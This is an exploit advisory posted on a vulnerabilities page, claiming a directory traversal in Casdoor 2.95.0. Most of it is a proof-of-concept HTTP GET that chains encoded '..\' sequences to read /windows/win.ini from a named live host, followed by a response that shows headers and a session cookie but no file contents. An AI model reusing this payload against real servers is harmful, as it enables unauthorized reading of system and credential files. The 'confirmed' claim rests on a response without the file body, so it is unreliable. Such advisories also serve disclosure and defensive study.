Casdoor 2.95.0 Directory Traversal
=============================================================================================================================================
| # Title Casdoor 2.95.0 Directory Traversal
=============================================================================================================================================
| # Title : Casdoor 2.95.0 Directory Traversal |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://casdoor.com |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211122/ & CVE-2023-34927
[+] Summary : The vulnerability confirmed here is a Directory Traversal affecting an application running on Casdoor 2.95.0
[+] POC :
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: door.casdoor.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain; charset=utf-8
Date: Sat, 06 Dec 2025 14:35:45 GMT
Last-Modified: Sat, 08 May 2021 08:18:31 GMT
Server: beegoServer:1.12.3
Set-Cookie: casdoor_session_id=891e4bf2d09b3240b7d1dd82ceba5c0f; Path=/; Expires=Mon, 05 Jan 2026 14:35:45 GMT; Max-Age=2592000; HttpOnly
Original-Content-Encoding: gzip
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Casdoor 2.95.0 Directory Traversal
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 136
